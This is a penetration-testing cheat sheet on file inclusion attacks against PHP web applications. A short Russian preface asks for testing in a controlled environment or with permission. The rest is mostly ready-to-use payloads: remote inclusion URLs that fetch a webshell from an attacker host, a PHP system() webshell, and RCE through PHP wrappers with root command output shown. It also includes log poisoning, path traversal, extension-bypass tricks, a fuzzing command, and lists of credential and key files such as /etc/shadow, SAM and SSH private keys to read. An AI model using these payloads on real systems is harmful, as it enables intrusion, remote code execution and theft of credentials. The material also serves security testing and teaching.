Включение файлов
:::tip Формат страницы
Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.
:::
Порядок действий
- Определите контекст (аутентификация, роль, границы доверия).
- Воспроизведите вектор атаки в контролируемой среде или с явным разрешением на целевой системе.
- Зафиксируйте PoC и влияние (конфиденциальность, целостность, доступность).
- Примеры запросов и команд ниже — на английском.
Методика
Remote File Inclusion
http://example.com/index.php?file=http://<ATTACKER_IP>/webshell.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php
PHP Wrappers
http://IP/index.php?page=php://filter/convert.base64-encode/resource=<file>
echo "<?php system(\$_GET['cmd']); ?>" > shell.php
zip -0 payload.zip shell.php;
rm shell.php
http://localhost/index.php?file=zip://payload.zip%23shell.php&cmd=id
http://localhost/index.php?cmd=id&file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bDQo=
cat shell.php
<?php system($_GET['cmd']); ?>
curl -s -X POST -d @shell.php "http://localhost/index.php?cmd=id&file=php://input"
uid=0(root) gid=0(root) groups=0(root)
http://example.com/index.php?file=expect://whoami
LFI2RCE
http://10.11.1.113/alertConfigField.php?urlConfig=../../../usr/local/databases/shell.php&cmd=id
Log Poisoning
[...]
User-Agent:<?php system($_GET['cmd']);?>
[...]
http://example.com/?view=dog/../../var/log/apache2/access.log&cmd=whoami
Path Traversal
http://example.com/?view=images/../../../../etc/passwd
Validation of file extension
Null byte
http://example/file=http://<ATTACKER_IP>/Revshells/shell.php%00.png
Comments
http://example/file=/etc/passwd#image.png
Parameter
http://example/file=/etc/passwd?fake=image.png
Miscellany
webshell.php%0A.png
webshell.php\n.png
webshell.php\u000a.png
webshell.php\u560a.png
webshell.php%E5%98%8A.png
webshell.php;.png
webshell.php%3B.png
webshell.php\u003b.png
webshell.php\u563b.png
webshell.php%E5%98%BB.png
Fuzzing
ffuf -u http://example.com/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=FUZZ -w file_inclusion_linux.txt -fs 0-1000
Windows
# System Files
c:\WINDOWS\system32\eula.txt
c:\boot.ini
c:\WINDOWS\win.ini
c:\WINNT\win.ini
c:\WINDOWS\Repair\SAM
windows\repair\SAM
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
# Web Files
c:\WINDOWS\php.ini
c:\WINNT\php.ini
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\xampp\apache\conf\httpd.conf
c:\php\php.ini
c:\php5\php.ini
c:\php4\php.ini
c:\apache\php\php.ini
c:\xampp\apache\bin\php.ini
c:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini// Some code
Linux
# File system users and groups
/etc/shadow
/etc/passwd
/etc/group
/etc/hostname
/etc/hosts
/etc/crontab
/etc/host.conf
/etc/resolv.conf
/etc/issue
/etc/samba/smb.conf
/dev/tcp/<IP>/<PORT>
/etc/sudoers
/etc/os-release
/etc/ls-release
/etc/lsb-release
/etc/redhat-release
/etc/*-release
# Command history files
~/.bash_history
/root/.bash_history
~/.zsh_history
/root/.zsh_history
~/.mysql_history
/root/.mysql_history
# SSH Files
~/.ssh/authorized_keys
~/.ssh/id_rsa
~/.ssh/id_rsa.keystore
~/.ssh/id_rsa.pub
~/.ssh/known_hosts
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/id_rsa.pub
/root/.ssh/known_hosts
# Filesystems to be mounted at boot time
/etc/fstab
# Currently mounted filesystems.
/etc/mtab
# Process files
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/net/fib_trie
/proc/version
/proc/self/environ
/proc/self/cmdline
# Logs
/etc/httpd/logs/acces_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/var/log/httpd/error_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
# Web Files
/etc/apache2/apache2.conf
/etc/httpd/conf/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/sites-enabled/default-ssl.conf